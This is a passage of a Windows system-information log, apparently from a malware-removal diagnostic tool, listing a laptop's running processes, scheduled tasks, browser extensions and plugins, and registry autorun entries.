C:\WINDOWS\system32\dashost.exe
"C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe"
C:\WINDOWS\SysWOW64\ssins.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
"C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe"
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
"C:\Program Files\Acer\Acer Quick Access\QASvc.exe"
"C:\Program Files (x86)\TeamViewer\TeamViewer.exe"
C:\WINDOWS\system32\igfxEM.exe
C:\WINDOWS\system32\igfxHK.exe
C:\WINDOWS\system32\SearchIndexer.exe /Embedding
C:\WINDOWS\system32\igfxTray.exe
"C:\Program Files\Acer\Acer Quick Access\QAEvent.exe"
"C:\Program Files (x86)\TeamViewer\tv_w32.exe" --action hooks --log C:\Program Files (x86)\TeamViewer\TeamViewer11_Logfile.log
C:\WINDOWS\system32\wbem\unsecapp.exe -Embedding
C:\WINDOWS\system32\wbem\wmiprvse.exe
"C:\Program Files (x86)\TeamViewer\tv_x64.exe" --action hooks --log C:\Program Files (x86)\TeamViewer\TeamViewer11_Logfile.log
"C:\Program Files\Acer\Acer Quick Access\QAMsg.exe"
"C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe"
"C:\Program Files\Acer\Acer Quick Access\RMSvc.exe"
"C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\ActivateDesktop.exe"
C:\Program Files\AVAST Software\Avast\AvastUI.exe
"C:\Program Files\Acer\Acer Quick Access\QuickAccess.exe" -hide
"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
"C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe"
"C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe"
"C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe"
C:\WINDOWS\system32\taskhost.exe
C:\WINDOWS\system32\taskeng.exe
C:\WINDOWS\system32\taskhostex.exe
"c:\program files (x86)\teamviewer\TeamViewer_Desktop.exe" --IPCport 5939
C:\WINDOWS\system32\svchost.exe -k defragsvc
C:\WINDOWS\system32\vssvc.exe
C:\WINDOWS\System32\svchost.exe -k swprv
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe" /RuntimeWide /Critical /StopEvent:948
\??\C:\WINDOWS\system32\conhost.exe 0x4
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" ExecuteQueuedItems 2 /LegacyServiceBehavior
"C:\Users\Eva Blažková\Desktop\RSITx64.exe"
C:\WINDOWS\system32\wbem\wmiprvse.exe

====== Scheduled tasks folder ======

C:\WINDOWS\system32\tasks\Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\WINDOWS\system32\tasks\Adobe Flash Player Updater - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
C:\WINDOWS\system32\tasks\ALU - C:\Program Files (x86)\Acer\Live Updater\updater.exe -auto
C:\WINDOWS\system32\tasks\ALUAgent - C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe
C:\WINDOWS\system32\tasks\Avast Emergency Update - C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
C:\WINDOWS\system32\tasks\CCleanerSkipUAC - "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
C:\WINDOWS\system32\tasks\Quick Access - "C:\Program Files\Acer\Acer Quick Access\QALauncher.exe"
C:\WINDOWS\system32\tasks\Quick Access Quick Launcher - "C:\Program Files\Acer\Acer Quick Access\QALauncher.exe" -noui -normsvc
C:\WINDOWS\system32\tasks\SafeZone scheduled Autoupdate 1452595167 - C:\Program Files\AVAST Software\SZBrowser\launcher.exe --scheduledautoupdate
C:\WINDOWS\system32\tasks\SafeZone scheduled Autoupdate 1458760155 - C:\Program Files\AVAST Software\SZBrowser\launcher.exe --scheduledautoupdate $(Arg0)
C:\WINDOWS\system32\tasks\Trigger KMS Activation - "C:\Program Files\KMSnano\TriggerKMS.exe" 31 "silent.cmd"
C:\WINDOWS\system32\tasks\UbtFrameworkService - "C:\Program Files\Acer\User Experience Improvement Program\Framework\TriggerFramework.exe"
C:\WINDOWS\system32\tasks\WPD\SqmUpload_S-1-5-21-3699476140-735458878-2518942289-1001 - %windir%\system32\rundll32.exe portabledeviceapi.dll,#1
C:\WINDOWS\system32\tasks\Recovery Management\Notification - C:\Program Files\Acer\Acer Recovery Management\Notification\Notification.exe
C:\WINDOWS\system32\tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask - %systemroot%\system32\sc.exe start osppsvc
C:\WINDOWS\system32\tasks\Microsoft\Windows\WS\License Validation - rundll32.exe WSClient.dll,WSpTLR licensing
C:\WINDOWS\system32\tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask - rundll32.exe WSClient.dll,RefreshBannedAppsList
C:\WINDOWS\system32\tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join - %SystemRoot%\System32\AutoWorkplace.exe join
C:\WINDOWS\system32\tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start - C:\WINDOWS\system32\sc.exe start wuauserv
C:\WINDOWS\system32\tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start With Network - C:\WINDOWS\system32\sc.exe start wuauserv
C:\WINDOWS\system32\tasks\Microsoft\Windows\Windows Media Sharing\UpdateLibrary - "%ProgramFiles%\Windows Media Player\wmpnscfg.exe"
C:\WINDOWS\system32\tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange - %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
C:\WINDOWS\system32\tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting - %windir%\system32\wermgr.exe -queuereporting
C:\WINDOWS\system32\tasks\Microsoft\Windows\UPnP\UPnPHostConfig - sc.exe config upnphost start= auto
C:\WINDOWS\system32\tasks\Microsoft\Windows\Time Zone\SynchronizeTimeZone - %windir%\system32\tzsync.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime - %windir%\system32\sc.exe start w32time task_started
C:\WINDOWS\system32\tasks\Microsoft\Windows\SystemRestore\SR - %windir%\system32\srtasks.exe ExecuteScheduledSPPCreation
C:\WINDOWS\system32\tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask - %windir%\system32\rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
C:\WINDOWS\system32\tasks\Microsoft\Windows\SpacePort\SpaceAgentTask - %windir%\system32\SpaceAgent.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Shell\FamilySafetyMonitor - %windir%\System32\wpcmon.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\RemovalTools\MRT_HB - C:\WINDOWS\system32\MRT.exe /EHB /Q
C:\WINDOWS\system32\tasks\Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask - %windir%\system32\RAServer.exe /offerraupdate
C:\WINDOWS\system32\tasks\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers - %SystemRoot%\System32\drvinst.exe 6
C:\WINDOWS\system32\tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo - %windir%\system32\gatherNetworkInfo.vbs
C:\WINDOWS\system32\tasks\Microsoft\Windows\MUI\LPRemove - %windir%\system32\lpremove.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser - %SystemRoot%\System32\MbaeParserTask.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Location\Notifications - %windir%\System32\LocationNotifications.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector - %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
C:\WINDOWS\system32\tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver - %windir%\system32\DFDWiz.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\DiskCleanup\SilentCleanup - %windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%
C:\WINDOWS\system32\tasks\Microsoft\Windows\Defrag\ScheduledDefrag - %windir%\system32\defrag.exe -c -h -o -$
C:\WINDOWS\system32\tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator - %SystemRoot%\System32\wsqmcons.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader - %windir%\system32\WSqmCons.exe -u
C:\WINDOWS\system32\tasks\Microsoft\Windows\Bluetooth\UninstallDeviceTask - BthUdTask.exe $(Arg0)
C:\WINDOWS\system32\tasks\Microsoft\Windows\Autochk\Proxy - %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
C:\WINDOWS\system32\tasks\Microsoft\Windows\AppxDeploymentClient\Pre-staged app cleanup - %windir%\system32\rundll32.exe %windir%\system32\AppxDeploymentClient.dll,AppxPreStageCleanupRunTask
C:\WINDOWS\system32\tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState - %windir%\system32\rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
C:\WINDOWS\system32\tasks\Microsoft\Windows\Application Experience\AitAgent - aitagent /increment
C:\WINDOWS\system32\tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - %windir%\system32\compattel\DiagTrackRunner.exe /UploadEtlFilesOnly
C:\WINDOWS\system32\tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater - %windir%\system32\rundll32.exe %windir%\system32\invagent.dll,RunUpdate
C:\WINDOWS\system32\tasks\Microsoft\Windows\Application Experience\StartupAppTask - %windir%\system32\rundll32.exe Startupscan.dll,SusRunTask
C:\WINDOWS\system32\tasks\Microsoft\Windows\AppID\PolicyConverter - %windir%\system32\appidpolicyconverter.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck - %windir%\system32\appidcertstorecheck.exe
C:\WINDOWS\system32\tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report - C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe /send
C:\WINDOWS\system32\tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe /f
C:\WINDOWS\system32\tasks\AVAST Software\Avast settings backup - C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs

=========Mozilla firefox=========

ProfilePath - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default

prefs.js - "browser.search.useDBForOrder" - true
prefs.js - "browser.startup.homepage" - "http:/seznam.cz"

"wrc@avast.com"=C:\Program Files\AVAST Software\Avast\WebRep\FF48
"sp@avast.com"=C:\Program Files\AVAST Software\Avast\SafePrice\FF48


[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 26.0.0.137 Plugin
"Path"=C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_137.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@canon.com/EPPEX]
"Description"=Canon My Image Garden
"Path"=C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=c:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0]
"Description"=Office Authorization plug-in for NPAPI browsers
"Path"=C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/SharePoint,version=14.0]
"Description"=Microsoft SharePoint Plug-in for Firefox
"Path"=C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@software602.cz/602XML Filler]
"Description"=602XML Filler Plugin
"Path"=C:\Program Files (x86)\Software602\602XML\Filler\npfiller.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.0.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.1.5]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.4]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0]
"Description"=WildTangent Games App V2 Presence Detector Plugin
"Path"=C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll


[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 26.0.0.137 Plugin
"Path"=C:\WINDOWS\system32\Macromed\Flash\NPSWF64_26_0_0_137.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=c:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0]
"Description"=Office Authorization plug-in for NPAPI browsers
"Path"=C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL


C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions\
{ea614400-e918-4741-9a97-7a972ff7c30b}

C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\addons.json
Adblock Plus - extension - {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}
Seznam lištička - extension - {ea614400-e918-4741-9a97-7a972ff7c30b}
uBlock Origin - extension - uBlock0@raymondhill.net

C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions.json
Avast Online Security - webextension - wrc@avast.com - C:\Program Files\AVAST Software\Avast\WebRep\FF48
Avast SafePrice - webextension - sp@avast.com - C:\Program Files\AVAST Software\Avast\SafePrice\FF48
Seznam lištička - extension - {ea614400-e918-4741-9a97-7a972ff7c30b} - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions\{ea614400-e918-4741-9a97-7a972ff7c30b}
Adblock Plus - extension - {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d} - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
Multi-process staged rollout - extension - e10srollout@mozilla.org - C:\Program Files (x86)\Mozilla Firefox\browser\features\e10srollout@mozilla.org.xpi
Pocket - extension - firefox@getpocket.com - C:\Program Files (x86)\Mozilla Firefox\browser\features\firefox@getpocket.com.xpi
Web Compat - extension - webcompat@mozilla.org - C:\Program Files (x86)\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi
Application Update Service Helper - extension - aushelper@mozilla.org - C:\Program Files (x86)\Mozilla Firefox\browser\features\aushelper@mozilla.org.xpi
Firefox Screenshots - extension - screenshots@mozilla.org - C:\Program Files (x86)\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi
Default - theme - {972ce4c6-7e08-4474-a285-3208198ce6fd} - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi
Follow-on Search Telemetry - extension - followonsearch@mozilla.com - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\features\{627a1210-f1fc-4161-b4a6-49ca822f1466}\followonsearch@mozilla.com.xpi
Shield Recipe Client - extension - shield-recipe-client@mozilla.org - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\features\{627a1210-f1fc-4161-b4a6-49ca822f1466}\shield-recipe-client@mozilla.org.xpi
uBlock Origin - extension - uBlock0@raymondhill.net - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\extensions\uBlock0@raymondhill.net.xpi

C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default\pluginreg.dat
Plugin - Shockwave Flash - 26.0.0.137 - C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_137.dll

=========Google Chrome=========

C:\Users\Eva Blažková\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Extension aapocclcgogkmnckokdopfmhonfmgoek 1 Prezentace Google 0.9
Extension ahfgeienlihckogmohjhadlkjgocpleb 1 Obchod Chrome 0.2
Extension aohghmighlieiainnegkcijnfilokake 1 Dokumenty Google 0.9
Extension apdfllckaahabafndbhieahigkjlhalf 1 Disk Google 14.1
Extension bepbmhgboaologfdajaanbcjmnhjmhfn 0
Extension bgjpfhpjcgdppjbgnpnjllokbmcdllig 1 Seznam Lištička - Email 1.4.2
Extension blmojkbhnkkphngknkmgccmlenfaelkd 1 Seznam Lištička - Slovník 1.4.6
Extension blpcfgokakmgnkcojhhkbfbldkacnbeo 1 YouTube 4.2.8
Extension cjpalhdlnbpafiamejdnhcphjbkeiagm 1 uBlock Origin 1.13.2
Extension coobgpohoikkiipiblmjeljniedjpjpf 1 Vyhledávání Google 0.0.0.30
Extension eemcgdkfndhakfknompkggombfjjjeno 1 Bookmark Manager 0.1
Extension efaidnbmnnnibpcajpcglclefindmkaj 2 Adobe Acrobat 15.1.0.3
Extension ennkphjdgehloodpbhlhldgbnhmacadg 1 Settings 0.2
Extension eofcbnmajmjmplflapaojjnihcjkigck 0 Avast SafePrice 12.0.222
Extension gdkkmnngogaccacpomdhdiahljbjihoc 1 Farmville 2 Beacon 1.5
Extension gfdkimpbcpahaombhbimeihdjnejgicl 1 Feedback 1.0
Extension ghbmnnjooekpmoecnnnilnnbdlolhkhi 0 Dokumenty Google offline 1.4
Extension giehconkeccliemdfiadldepjbbdjllm 1 IATE 2.2
Extension gomekmidlodglbbmalcneegieacbdmki 2 Avast Online Security 10.2.0.190
Extension ilfoopambfaclfjmpiaijnccgcmbeigi 1 FormApps Extension 2.5.0.27
Extension kmendfapggjehodndflmmgagdbamhnfd 1 CryptoTokenExtension 0.9.46
Extension mfehgcgbbipciphmccgaenjidiccnmng 1 Cloud Print 0.1
Extension mgndgikekgjfcpckkfioiadnlibdjbkf 1 Chrome 0.1
Extension mhjfbmdgcfjbbpaeojofohoefgiehjai 1 Chrome PDF Viewer 1
Extension neajdppkdcdipfabeoofebfddakdcjhd 1 Google Network Speech 1.0
Extension nkeimhogjdpnpccoofpliimaahmaaome 1 Google Hangouts 1.3.3
Extension nmmhkkegccagdldgiimedpiccmgmieda 1 Platby Internetového obchodu Chrome 1.0.0.2
Extension olfeabkoenfaoljndfecamgilllcpiak 1 Seznam Lištička - Rychlá volba 1.9.1
Extension pafkbggdmjlpgkdkcbjmhmfcdpncadgh 1 Google Now 1.2.0.1
Extension pjkljhegncpnkpknbcohdijeoejaedia 1 Gmail 8.1
Extension pkedcjkdefgpdelpbcmbmeomcjbeemfm 1 Chrome Media Router 5917.424.0.6
Homepage: http://www.seznam.cz/
default_search_provider.search_url:
C:\Users\Eva Blažková\AppData\Local\Google\Chrome\User Data\Default\Preferences
Homepage:
default_search_provider.search_url:

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\eofcbnmajmjmplflapaojjnihcjkigck]
"Path"=C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChromeSp.crx

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gomekmidlodglbbmalcneegieacbdmki]
"Path"=C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx


======Registry dump ======


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={3C5B5400-6BFA-4617-B59B-A76A2EDA6B93}
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{3C5B5400-6BFA-4617-B59B-A76A2EDA6B93}]
"URL"=http://www.bing.com/search?q={searchTer ... TR&pc=ACJB


[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={3C5B5400-6BFA-4617-B59B-A76A2EDA6B93}
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes\{3C5B5400-6BFA-4617-B59B-A76A2EDA6B93}]
"URL"=http://www.bing.com/search?q={searchTer ... TR&pc=ACJB

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3785D0AD-BFFF-47F6-BF5B-A587C162FED9}]
Canon Easy-WebPrint EX BHO - C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23 217784]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{449D0D6E-2412-4E61-B68F-1CB625CD9E52}]
ExplorerBHO Class - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2014-01-18 796352]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 6671064]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-04-26 895528]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}]
Office Document Cache Handler - C:\PROGRA~1\MICROS~2\Office14\URLREDIR.DLL [2013-03-06 690392]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EA801577-E6AD-4BD5-8F71-4BE0154331A4}]
ClassicIEBHO Class - C:\Program Files\Classic Shell\ClassicIEDLL_64.dll [2014-01-18 483520]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3785D0AD-BFFF-47F6-BF5B-A587C162FED9}]
Canon Easy-WebPrint EX BHO - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23 184488]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{449D0D6E-2412-4E61-B68F-1CB625CD9E52}]
ExplorerBHO Class - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2014-01-18 674496]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 4171480]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-04-26 773920]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}]
Office Document Cache Handler - C:\PROGRA~2\MICROS~2\Office14\URLREDIR.DLL [2013-03-06 562904]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EA801577-E6AD-4BD5-8F71-4BE0154331A4}]
ClassicIEBHO Class - C:\Program Files\Classic Shell\ClassicIEDLL_32.dll [2014-01-18 437440]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{553891B7-A0D5-4526-BE18-D3CE461D6310} - Classic Explorer Bar - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2014-01-18 796352]
{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - Canon Easy-WebPrint EX - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23 6149288]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\Toolbar]
{553891B7-A0D5-4526-BE18-D3CE461D6310} - Classic Explorer Bar - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2014-01-18 674496]
{759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - Canon Easy-WebPrint EX - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23 4452504]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RTHDVCPL"=C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-03-21 13672304]
"Classic Start Menu"=C:\Program Files\Classic Shell\ClassicStartMenu.exe [2014-01-18 161984]
"AutoRearm"=C:\WINDOWS\AutoRearm\AutoRearm.exe [2014-11-11 529408]
"BCSSync"=C:\Program Files\Microsoft Office\Office14\BCSSync.exe [2012-11-05 108144]
"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2017-04-26 213824]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"BtvStack"=C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [2014-02-26 134784]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"cz.seznam.software.autoupdate"=C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz\szninstall.exe [2013-05-16 1062472]
"cz.seznam.software.szndesktop"=C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe [2015-05-26 103080]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"seznam-listicka-distribuce"=C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe [2013-05-16 1062472]
"CanonQuickMenu"=C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [2016-03-11 1314432]
"IJNetworkScannerSelectorEX"=C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [2014-01-15 438888]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"BtvStack"=C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [2014-02-26 134784]

C:\Users\Eva Blažková\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Výřezy obrazovky a spuštění aplikace OneNote 2010.lnk - C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL [2013-12-19 6671064]

